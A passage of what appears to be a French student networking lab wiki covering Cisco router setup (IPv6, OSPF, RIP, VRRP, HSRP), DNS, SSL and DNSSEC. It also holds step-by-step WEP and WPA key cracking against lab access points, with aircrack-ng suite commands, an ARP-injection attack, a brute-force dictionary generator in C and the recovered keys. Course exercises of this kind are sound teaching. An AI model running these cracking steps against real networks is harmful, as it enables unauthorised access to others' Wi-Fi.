&amp;lt;pre&amp;gt;ping 193.48.57.171&lt;br /&gt;
PING 193.48.57.171 (193.48.57.171) 56(84) bytes of data.&lt;br /&gt;
64 bytes from 193.48.57.171: icmp_seq=1 ttl=255 time=0.360 ms&lt;br /&gt;
64 bytes from 193.48.57.171: icmp_seq=2 ttl=255 time=0.271 ms&lt;br /&gt;
^C&lt;br /&gt;
--- 193.48.57.171 ping statistics ---&lt;br /&gt;
2 packets transmitted, 2 received, 0% packet loss, time 999ms&lt;br /&gt;
rtt min/avg/max/mdev = 0.271/0.315/0.360/0.047 ms&amp;lt;/pre&amp;gt;&lt;br /&gt;
Notre configuration locale est donc maintenant achevée. Nous pouvons passer à la configuration de l'interconnexion ipv4 et ipv6 de l'école.&lt;br /&gt;
&lt;br /&gt;
====Travail réalisé la 4e semaine====&lt;br /&gt;
=====Configuration IPv6=====&lt;br /&gt;
Nous avons donc pu commencer la configuration IPv6 de notre routeur.&amp;lt;br /&amp;gt;&lt;br /&gt;
Chaque bridge-domain aura son adresse IP dans le réseau IPv6 de l'école, avec un préfixe débutant à 2001:660:4401:60b0::/64.&amp;lt;br /&amp;gt;&lt;br /&gt;
La configuration est la suivante, pour chaque BDI:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;cisco(config)#int BDI6                                                          &lt;br /&gt;
cisco(config-if)#ipv6 address 2001:660:4401:60b4::/64 eui-64                    &lt;br /&gt;
cisco(config-if)#ipv6 nd prefix 2001:660:4401:60b4::/64 1000 900                &lt;br /&gt;
cisco(config-if)#ipv6 nd router-preference high                                 &lt;br /&gt;
cisco(config-if)#ipv6 enable&amp;lt;/pre&amp;gt;&lt;br /&gt;
=====Configuration OSPF (IPv4)=====&lt;br /&gt;
Dès notre arrivée, Mr.REDON nous a dit que, pour booster le TP, il avait effectué lui-même la configuration OSPF de notre routeur. La voici:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;router ospf 1&lt;br /&gt;
 router-id 10.60.2.1&lt;br /&gt;
 summary-address 10.60.0.0 255.255.0.0&lt;br /&gt;
 summary-address 193.48.57.160 255.255.255.240&lt;br /&gt;
 redistribute connected metric 30 subnets&lt;br /&gt;
 network 192.168.222.0 0.0.0.7 area 1&amp;lt;/pre&amp;gt;&lt;br /&gt;
=====Configuration RIP (IPv6)=====&lt;br /&gt;
Le protocole RIPv6 est une stratégie de routage pour IPv6. Ce protocole est configuré pour le BDI130 (correspondant au VLAN130 d'interconnexion des routeurs de l'école). La configuration de RIP est la suivante:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;ipv6 router rip tpima5sc&lt;br /&gt;
 redistribute connected metric 1&lt;br /&gt;
 redistribute static metric 1&lt;br /&gt;
 redistribute rip 1 metric 1&amp;lt;/pre&amp;gt;&lt;br /&gt;
La prise en compte du protocole RIP dans la BDI130 est la suivante:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;interface BDI130&lt;br /&gt;
 ip address 192.168.222.1 255.255.255.248&lt;br /&gt;
 ipv6 address 2001:660:4401:60AA::/64 eui-64&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60AA::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 ipv6 rip tpima5sc enable&amp;lt;/pre&amp;gt;&lt;br /&gt;
Pour confirmer notre résultat, nous regardons la table de routage IPv6:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; cisco#sh ipv6 route&lt;br /&gt;
IPv6 Routing Table - default - 65 entries&lt;br /&gt;
Codes: C - Connected, L - Local, S - Static, U - Per-user Static route&lt;br /&gt;
       B - BGP, R - RIP, I1 - ISIS L1, I2 - ISIS L2&lt;br /&gt;
       IA - ISIS interarea, IS - ISIS summary, D - EIGRP, EX - EIGRP external&lt;br /&gt;
       ND - ND Default, NDp - ND Prefix, DCE - Destination, NDr - Redirect&lt;br /&gt;
       O - OSPF Intra, OI - OSPF Inter, OE1 - OSPF ext 1, OE2 - OSPF ext 2&lt;br /&gt;
       ON1 - OSPF NSSA ext 1, ON2 - OSPF NSSA ext 2, a - Application&lt;br /&gt;
R   ::/0 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:60::/64 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:6000::/56 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:6002::/64 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:6003::/64 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:6004::/64 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:6005::/64 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:6006::/64 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&amp;lt;/pre&amp;gt;&lt;br /&gt;
Notre routeur détecte les routeurs de l'école, notre configuration est donc achevée.&amp;lt;br /&amp;gt;&lt;br /&gt;
=====Configuration VRRP=====&lt;br /&gt;
Le VRRP est un protocole de redondance. Une adresse IP virtuelle (IP flottante) est montée sur 1 des 2 routeurs. Si le routeur sur laquelle est montée l'IP flottante tombe, l'IP est montée sur l'autre routeur. De plus, les machines pourront envoyer les paquets vers l'adresse IP virtuelle, et le VRRP dispatchera les paquets entre les 2 routeurs.&amp;lt;br /&amp;gt;&lt;br /&gt;
Voici la configuration VRRP de notre routeur:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;interface BDI2&lt;br /&gt;
 ip address 10.60.2.1 255.255.255.0&lt;br /&gt;
 ipv6 address 2001:660:4401:60B0::/64 eui-64&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60B0::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 vrrp 1 ip 10.60.2.3&lt;br /&gt;
 vrrp 1 priority 110&amp;lt;/pre&amp;gt;&lt;br /&gt;
10.60.X.1 est l'espace des adresses IP de notre routeur (4331), 10.60.X.2 est l'espace des adresses IP du routeur 3560E, donc 10.60.X.3 est l'espace des adresses IP flottantes, X représente le numéro du BDI.&amp;lt;br /&amp;gt;&lt;br /&gt;
Nous pouvons voir si notre configuration VRRP est effective : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;cisco#sh vrrp&lt;br /&gt;
BDI12 - Group 1  &lt;br /&gt;
  State is Master&lt;br /&gt;
  Virtual IP address is 193.48.57.173&lt;br /&gt;
  Virtual MAC address is 0000.5e00.0101&lt;br /&gt;
  Advertisement interval is 1.000 sec&lt;br /&gt;
  Preemption enabled&lt;br /&gt;
  Priority is 110 &lt;br /&gt;
  Master Router is 193.48.57.171 (local), priority is 110 &lt;br /&gt;
  Master Advertisement interval is 1.000 sec&lt;br /&gt;
  Master Down interval is 3.570 sec&lt;br /&gt;
&lt;br /&gt;
BDI2 - Group 1  &lt;br /&gt;
  State is Master&lt;br /&gt;
  Virtual IP address is 10.60.2.3&lt;br /&gt;
  Virtual MAC address is 0000.5e00.0101&lt;br /&gt;
  Advertisement interval is 1.000 sec&lt;br /&gt;
  Preemption enabled&lt;br /&gt;
  Priority is 110 &lt;br /&gt;
  Master Router is 10.60.2.1 (local), priority is 110 &lt;br /&gt;
  Master Advertisement interval is 1.000 sec&lt;br /&gt;
  Master Down interval is 3.570 sec&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Cependant, même si notre configuration VRRP est bonne, nous n'arrivons pas à ping 193.48.57.173, qui représente l'adresse IP virtuelle montée sur le bridge-domain des VM.&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=====Craquage de clé WEP=====&lt;br /&gt;
On bascule d’abord la carte en mode monitor : &lt;br /&gt;
&amp;lt;pre&amp;gt; airmon-ng start xxxxxxxx  &amp;lt;/pre&amp;gt;&lt;br /&gt;
Ensuite on scan tous les réseaux wifi captés par cette même carte :&lt;br /&gt;
&amp;lt;pre&amp;gt; airodump-ng –encrypt wep wlan 0 &amp;lt;/pre&amp;gt;&lt;br /&gt;
On obtient :&lt;br /&gt;
&amp;lt;pre&amp;gt; &lt;br /&gt;
 CH 13 ][ Elapsed: 4 s ][ 2016-03-08 10:32                                         &lt;br /&gt;
                                                                                                                  &lt;br /&gt;
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                                  &lt;br /&gt;
 44:AD:D9:5F:87:00  -44        2        0    0  11  54e. WEP  WEP         Wolverine                               &lt;br /&gt;
 04:DA:D2:9C:50:53  -66        2        0    0  13  54e. WEP  WEP         cracotte04                              &lt;br /&gt;
 04:DA:D2:9C:50:55  -70        2       91   35  13  54e. WEP  WEP         cracotte06                              &lt;br /&gt;
 04:DA:D2:9C:50:51  -69        4       33   13  13  54e. WEP  WEP         cracotte02                              &lt;br /&gt;
 04:DA:D2:9C:50:57  -67        3       44   19  13  54e. WEP  WEP         cracotte08                              &lt;br /&gt;
 04:DA:D2:9C:50:56  -69        2       38   11  13  54e. WEP  WEP         cracotte07                              &lt;br /&gt;
 04:DA:D2:9C:50:54  -68        2       37   14  13  54e. WEP  WEP         cracotte05                              &lt;br /&gt;
 04:DA:D2:9C:50:58  -70        2      175   70  13  54e. WEP  WEP         cracotte09                              &lt;br /&gt;
 04:DA:D2:9C:50:50  -68        0      142   52  13  -1   WEP  WEP         &amp;lt;length:  0&amp;gt;                            &lt;br /&gt;
 04:DA:D2:9C:50:52  -70        2      171   64  13  54e. WEP  WEP         cracotte03                              &lt;br /&gt;
                                                                                                                  &lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                         &lt;br /&gt;
                                                                                                                   &lt;br /&gt;
 04:DA:D2:9C:50:55  00:0F:B5:92:23:6B  -66    0 - 9e  1160       50                                                &lt;br /&gt;
 04:DA:D2:9C:50:51  00:0F:B5:92:24:51  -62    0 -48e    34        7                                                &lt;br /&gt;
 04:DA:D2:9C:50:57  00:0F:B5:92:22:66  -64    0 - 6e    31        6                                                &lt;br /&gt;
 04:DA:D2:9C:50:56  00:0F:B5:92:23:71  -66    0 -48e    60        6                                                &lt;br /&gt;
 04:DA:D2:9C:50:54  00:0F:B5:92:23:74  -70    0 -24e    52       11                                                &lt;br /&gt;
 04:DA:D2:9C:50:58  00:0F:B5:92:23:69  -62    0 -48e    12      140  &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ici nous avons choisi cracotte06 comme wifi cible. On récupère donc son BSSID : 04 :DA :D2 :9C :50 :55 sur le channel 13&amp;lt;br /&amp;gt;&lt;br /&gt;
On surveille uniquement notre cible pour s'assurer qu'une machine s'y connecte bien :&lt;br /&gt;
&amp;lt;pre&amp;gt; airodump-ng –w out –c 13 –bssid 04 :DA :D2 :9C :50 :55 wlan0 &amp;lt;/pre&amp;gt; &amp;lt;br /&amp;gt;&lt;br /&gt;
Pour le craquage, il faut au préalable surchargé de requête ARP le réseau cible pour récupérer un maximum de trame d’échanges.&lt;br /&gt;
&amp;lt;pre&amp;gt; aireplay-ng -3 –e cracotte06 –a 04 :DA :D2 :9C :50 :55 –b 04 :DA :D2 :9C :50 :55 –h 00:0F:B5:92:23:6B –x 1000 –n out-ox.cap wlan0 &amp;lt;/pre&amp;gt;&lt;br /&gt;
Une fois un nombre de trame récupéré assez conséquent, on lance l’utilitaire : &amp;lt;pre&amp;gt;aircarck-ng out_ox.cap&amp;lt;/pre&amp;gt; avec out_ox.cap le fichier de sauvegarde contenant toutes les trames ARP récupérées. &lt;br /&gt;
&lt;br /&gt;
On a alors réussi notre craquage au bout de quelque minutes :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
  Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                 [00:00:01] Tested 785 keys (got 1349085 IVs)&lt;br /&gt;
&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/  2   EE(1862400) 75(1396736) DB(1392128) FF(1388544) 50(1387520) &lt;br /&gt;
    1    1/  4   DD(1419264) 1B(1397504) 2C(1392128) 54(1387776) 26(1385728) &lt;br /&gt;
    2   47/  2   DB(1365760) 38(1364736) 00(1364480) 22(1364480) 82(1364480) &lt;br /&gt;
    3    1/  2   26(1407488) 2C(1390592) 65(1387520) F0(1387520) FE(1387520) &lt;br /&gt;
    4    4/  4   F6(1383168) CD(1382656) 7E(1381376) F0(1380096) 58(1379840) &lt;br /&gt;
&lt;br /&gt;
             KEY FOUND! [ EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:44:44:44 ] &lt;br /&gt;
	Decrypted correctly: 100%&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====Travail réalisé la 5ème semaine ====&lt;br /&gt;
=====Configuration HSRP=====&lt;br /&gt;
Le VRRP n'était pas compatible sur le routeur du groupe 6 (3560E) à cause de la trop faible version de 'IOS Cisco. Du coup, il nous a été demandé de mettre en place le protocole en dessous de VRRP, HSRP.&amp;lt;br /&amp;gt;&lt;br /&gt;
Le protocole HSRP fonctionne comme le VRRP, et s'implémente, par BDI, comme suit:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;Sstandby 1 ip 10.60.X.3&lt;br /&gt;
standby 1 preempt&lt;br /&gt;
standby 1 priority 100&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Il fallait aussi que notre routeur soit connecté au 2e commutateur via une liaison fibre en mode trunk. Ainsi, nous pouvons voir, dans ce qui suit, que le routeur maitre est le routeur 3560E, et que nous sommes en standby !&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;BDI2 - Group 1 (version 2)&lt;br /&gt;
  State is Standby&lt;br /&gt;
    7 state changes, last state change 00:01:16&lt;br /&gt;
  Virtual IP address is 10.60.2.3&lt;br /&gt;
  Active virtual MAC address is 0000.0c9f.f001 (MAC Not In Use)&lt;br /&gt;
    Local virtual MAC address is 0000.0c9f.f001 (v2 default)&lt;br /&gt;
  Hello time 3 sec, hold time 10 sec&lt;br /&gt;
    Next hello sent in 0.128 secs&lt;br /&gt;
  Preemption enabled&lt;br /&gt;
  Active router is 10.60.2.2, priority 110 (expires in 8.784 sec)&lt;br /&gt;
    MAC address is d4d7.4842.53c1&lt;br /&gt;
  Standby router is local&lt;br /&gt;
  Priority 100 (default 100)&lt;br /&gt;
  Group name is &amp;quot;Vlan2&amp;quot; (cfgd)&amp;lt;/pre&amp;gt;&lt;br /&gt;
=====Craquage clé WPA =====&lt;br /&gt;
&lt;br /&gt;
Pour ce craquage, nous avons gardé la même cible, c'est à dire cracotte06. Il faut encore ici s'assurer qu'une machine est connecté à cette borne.&lt;br /&gt;
Pour le craquage WPA, il nous faut 2 éléments : &amp;lt;br /&amp;gt;&lt;br /&gt;
- Un fichier d'échange contenant le handshake &amp;lt;br /&amp;gt;&lt;br /&gt;
- Un dictionnaire contenant toutes les possibilités de valeur que peut avoir la clé.  &lt;br /&gt;
&lt;br /&gt;
Ici nous avons simplement récupéré le handshake grâce à la commande d'écoute de la borne :&lt;br /&gt;
&amp;lt;pre&amp;gt;  airodump-ng -w out --encrypt wpa -c 13 --04 :DA :D2 :9C :50 :55  wlan0 &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Grâce à l'option -w out, il nous a créée un fichier stockant le hanshake. &lt;br /&gt;
&lt;br /&gt;
En parallèle nous avons généré le fichier txt jouant le rôle de dictionnaire, à l'aide d'un programme C. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
#include &amp;lt;stdlib.h&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
int main(){&lt;br /&gt;
	FILE *fp=fopen(&amp;quot;dico.txt&amp;quot;,&amp;quot;w+&amp;quot;);&lt;br /&gt;
	int i =0;&lt;br /&gt;
	for(i=0;i&amp;lt;=99999999;i++){&lt;br /&gt;
		fprintf(fp,&amp;quot;%08d\n&amp;quot;,i);&lt;br /&gt;
	}&lt;br /&gt;
	return 0;&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Finalement on utilise l'utilitaire aircrack avec en paramètre le fichier de sauvegarde contenant le handshake ainsi que le fichier texte dictionnaire :&lt;br /&gt;
&amp;lt;pre&amp;gt;  aircrack-ng -w dico.txt dump-02.cap &amp;lt;/pre&amp;gt;&lt;br /&gt;
On obtient avec succès au bout de quelque minutes : &lt;br /&gt;
&amp;lt;pre&amp;gt; &lt;br /&gt;
Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                   [01:01:47] 12399904 keys tested (3519.77 k/s)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                           KEY FOUND! [ 12399907 ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
      Master Key     : F5 4A 19 53 7C DB 88 D1 D0 21 3B FD FF 5F EF CD &lt;br /&gt;
                       D0 DE 05 F5 0F DB 08 79 85 16 17 8B E0 E4 6B 23 &lt;br /&gt;
&lt;br /&gt;
      Transient Key  : 25 94 12 1B 71 2C 49 01 10 44 34 8A 8A 74 36 47 &lt;br /&gt;
                       7B 1C D8 3D 77 A5 9B 9D 74 44 DC C7 5F 55 D7 0B &lt;br /&gt;
                       2B 29 83 CC FC 08 7E DF BF A6 B7 76 AF BA D5 8A &lt;br /&gt;
                       07 F0 61 B1 02 3A 56 B2 A2 03 CD 80 20 14 3E D8 &lt;br /&gt;
&lt;br /&gt;
      EAPOL HMAC     : CF 04 96 3D DC 43 B4 D1 0E D5 0F B5 78 2F 57 C9 &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
=====Configuration DNS=====&lt;br /&gt;
Dans un premier temps, nous réservons sur Gandi notre nom de domaine : speedflash.space&amp;lt;br /&amp;gt;&lt;br /&gt;
Ensuite, nous installons les paquets bind9, ainsi que apache2.&amp;lt;br /&amp;gt;&lt;br /&gt;
Nous configurons les fichiers nécessaires à la bonne marche du serveur DNS à savoir les fichiers named.conf.local (autorisation de transfert de paquets vers le DNS esclave - Utilisation du bon fichier de zone), puos db.speedflash.space (fichier de zone)&amp;lt;br /&amp;gt;&lt;br /&gt;
Voici la configuration de ces 2 fichiers :&amp;lt;br /&amp;gt;&lt;br /&gt;
named.conf.local :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;zone &amp;quot;speedflash.space&amp;quot; {&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;/etc/bind/db.speedflash.space&amp;quot;;&lt;br /&gt;
        allow-transfer {217.70.177.40;};&lt;br /&gt;
};&amp;lt;/pre&amp;gt;&lt;br /&gt;
217.70.177.40 est l'adresse IP du serveur DNS de Gandi (ns6.gandi.net) que nous avons pris pour serveur esclave.&amp;lt;br /&amp;gt;&lt;br /&gt;
db.speedflash.space:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;;&lt;br /&gt;
; BIND data file for local loopback interface&lt;br /&gt;
;&lt;br /&gt;
$TTL    604800&lt;br /&gt;
@       IN      SOA     ns.speedflash.space. root.speedflash.space (&lt;br /&gt;
                              2         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
;&lt;br /&gt;
        IN      NS      ns.speedflash.space.&lt;br /&gt;
ns      IN      A       193.48.57.165&lt;br /&gt;
www     IN      A       193.48.57.165&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Nous déclarons que notre DNS (ns) est à l'adresse 193.48.57.165, soit l'IP de notre VM.&amp;lt;br /&amp;gt;&lt;br /&gt;
Ensuite, pour faire fonctionner le tout, on relance bind : &amp;lt;pre&amp;gt; service bind9 restart &amp;lt;/pre&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
Et à l'aide du fichier de log daemon.log, on peut confirmer que bind s'est lancé sans erreur :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;tail /var/log/daemon.log | grep named&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: command channel listening on ::1#953&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: managed-keys-zone: journal file is out of date: removing journal file&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: managed-keys-zone: loaded serial 3&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: zone 0.in-addr.arpa/IN: loaded serial 1&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: zone speedflash.space/IN: loaded serial 2&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: zone 127.in-addr.arpa/IN: loaded serial 1&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: zone 255.in-addr.arpa/IN: loaded serial 1&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: zone localhost/IN: loaded serial 2&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: all zones loaded&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: running&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=====Securisation de site par SSL=====&lt;br /&gt;
Afin d'obtenir un certificat SSL par Gandi, nous avons besoin d'un CSR. Nous générons donc le CSR par la commande :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;openssl req -nodes -newkey rsa:2048 -sha1 -keyout serveur.key -out serveur.csr&amp;lt;/pre&amp;gt;&lt;br /&gt;
Nous fournissons ce CSR à Gandi, puis nous attendons d'avoir notre certificat. Une fois le certificat obtenu, on peut copier les bons fichiers dans SSL :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Flash:/etc/bind# cp certificat.crt /etc/ssl/certs/speedflash.space.crt&lt;br /&gt;
root@Flash:/etc/bind# cp serveur.key /etc/ssl/private/speedflash.space.key&lt;br /&gt;
root@Flash:/etc/bind# cp GandiStandardSSLCA.pem /etc/ssl/certs/GandiStandardSSLCA.pem&amp;lt;/pre&amp;gt;&lt;br /&gt;
GandiStandardSSLCA.pem est un certificat intermédiaire afin de certifier notre certificat.&amp;lt;br /&amp;gt;&lt;br /&gt;
Ensuite, nous re-hashons toute la structure afin de prendre en compte notre certificat :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@Flash:/etc/bind# c_rehash /etc/ssl/certs&lt;br /&gt;
Doing /etc/ssl/certs&lt;br /&gt;
speedflash.space.crt =&amp;gt; ac112f31.0&lt;br /&gt;
speedflash.space.crt =&amp;gt; a88e5e47.0&lt;br /&gt;
GandiStandardSSLCA.pem =&amp;gt; 0cad7ee9.0&lt;br /&gt;
GandiStandardSSLCA.pem =&amp;gt; 3a57595e.0&lt;br /&gt;
ssl-cert-snakeoil.pem =&amp;gt; 816e77e4.0&lt;br /&gt;
ssl-cert-snakeoil.pem =&amp;gt; de4674a3.0&amp;lt;/pre&amp;gt;&lt;br /&gt;
Il faut modifier le fichier 000-speedflash.space-ssl.conf afin d'associer APACHE et notre nom de serveur : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;NameVirtualHost *:443&lt;br /&gt;
        &amp;lt;VirtualHost 193.48.57.165:443&amp;gt;&lt;br /&gt;
                ServerName www.speedflash.space&lt;br /&gt;
                ServerAlias speedflash.space&lt;br /&gt;
                DocumentRoot /var/www/www.speedflash.space/&lt;br /&gt;
                CustomLog /var/log/apache2/secure_acces.log combined&lt;br /&gt;
&lt;br /&gt;
                SSLEngine on&lt;br /&gt;
                SSLCertificateFile /etc/ssl/certs/speedflash.space.crt&lt;br /&gt;
                SSLCertificateKeyFile /etc/ssl/private/speedflash.space.key&lt;br /&gt;
                SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA.pem&lt;br /&gt;
                SSLVerifyClient None&lt;br /&gt;
        &amp;lt;/VirtualHost&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
Il faut activer le module SSL de Apache : &amp;lt;pre&amp;gt; a2modssl&amp;lt;/pre&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
Nous pouvons donc activer notre Apache avec notre certificat : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Flash:/etc/bind# a2ensite 000-speedflash.space-ssl.conf &lt;br /&gt;
Enabling site 000-speedflash.space-ssl.&lt;br /&gt;
root@Flash:/etc/bind# service apache2 reload&amp;lt;/pre&amp;gt;&lt;br /&gt;
Nous pouvons vérifier que le site est sécurisé en allant sur https://www.speedflash.space et en voyant le cadenas vert.&amp;lt;br /&amp;gt;&lt;br /&gt;
=====Securisation de DNS par DNSSEC=====&lt;br /&gt;
Il faut générer les clés .key et .private afin de pouvoir signer les zones et les enregistrements.&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; dnssec-keygen -a RSASHA1 -b 2048 -f KSK -r /dev/urandom -n ZONE speedflash.space &amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE speedflash.space &amp;lt;/pre&amp;gt;&lt;br /&gt;
l'option -r /dev/urandom est ici pour accélérer la génération des clés &amp;lt;br /&amp;gt;&lt;br /&gt;
Nous incluons les clés dans le fichier de zone db.speedflash.space : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;$include /etc/bind/speedflash.space.dnssec/speedflash.space-ksk.key&lt;br /&gt;
$include /etc/bind/speedflash.space.dnssec/speedflash.space-zsk.key&amp;lt;/pre&amp;gt;&lt;br /&gt;
On signe donc la zone : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Flash:/etc/bind/speedflash.space.dnssec# dnssec-signzone -o speedflash.space -k speedflash.space-ksk ../db.speedflash.space speedflash.space-zsk&lt;br /&gt;
Verifying the zone using the following algorithms: RSASHA1.&lt;br /&gt;
Zone fully signed:&lt;br /&gt;
Algorithm: RSASHA1: KSKs: 1 active, 0 stand-by, 0 revoked&lt;br /&gt;
                    ZSKs: 1 active, 0 stand-by, 0 revoked&lt;br /&gt;
../db.speedflash.space.signed&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
On ajoute le DNSSEC à Gandi : &amp;lt;br /&amp;gt;&lt;br /&gt;
[[Dns-gandi.png]]&amp;lt;br /&amp;gt;&lt;br /&gt;
On vérifie que notre DNS est bien sécurisé en essayant la commande : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Flash:/etc/bind# dig DNSKEY speedflash.space @localhost&lt;br /&gt;
&lt;br /&gt;
; &amp;lt;&amp;lt;&amp;gt;&amp;gt; DiG 9.9.5-9+deb8u8-Debian &amp;lt;&amp;lt;&amp;gt;&amp;gt; DNSKEY speedflash.space @localhost&lt;br /&gt;
;; global options: +cmd&lt;br /&gt;
;; Got answer:&lt;br /&gt;
;; -&amp;gt;&amp;gt;HEADER&amp;lt;;; flags: qr aa rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 0, ADDITIONAL: 1&lt;br /&gt;
&lt;br /&gt;
;; OPT PSEUDOSECTION:&lt;br /&gt;
; EDNS: version: 0, flags:; udp: 4096&lt;br /&gt;
;; QUESTION SECTION:&lt;br /&gt;
;speedflash.space.        IN    DNSKEY&lt;br /&gt;
&lt;br /&gt;
;; ANSWER SECTION:&lt;br /&gt;
speedflash.space.    604800    IN    DNSKEY    257 3 5 AwEAAaJcjim9pdD8U6InsiCNFzJthDwsiwGgPylxRp5nDuoaGrcDp1LU psBv0iY0VUqzcC+uRhTTfjl6P3yuPsnZYefVlSEeRpn9QR33Hioadbhc aFSuYnfwS/L/R6Kwt2XFz5V/fI/j+M2AtGxhBFgVKtmjvnwEr2VfdkFl d9AZJQu09ajWCJIKeL2dRE5bPbXwkDilgkQkBZUVWtXN7qwnrFnlszpb gSdRKosfhScAUmTerxOV6WybzOYb+9D0r8QrDoIhhCpf1/gczAUzHPWd hb0rxIGHk6seMp1qTotZE3SgxrCwm7H6z4pcXeMfbdNzkrIgcJmum9i0 zsLzlghkAPM=&lt;br /&gt;
speedflash.space.    604800    IN    DNSKEY    256 3 5 AwEAAcHrx5vtsGzY7LF32x3HRIXRwOBm3WZM02NHY4s0uB2djn6tV52B ss78iXC4O5hdpJ0uOxS0/MNCYNJkIXnWsvAHc6lbdWfQ8Jvnj/aBMz94 agXbxXkseqjlIcF1huspBAi9lcY5hsy59MDek5iNlduy8HK6AVItqeQi HviShcq3&amp;lt;/pre&amp;gt;&lt;br /&gt;
On remarque bien la présence de DNSKEY qui nous assure que notre DNS est sécurisé.&amp;lt;br /&amp;gt;&lt;/div&gt;</summary>
		<author><name>Troj</name></author>	</entry>

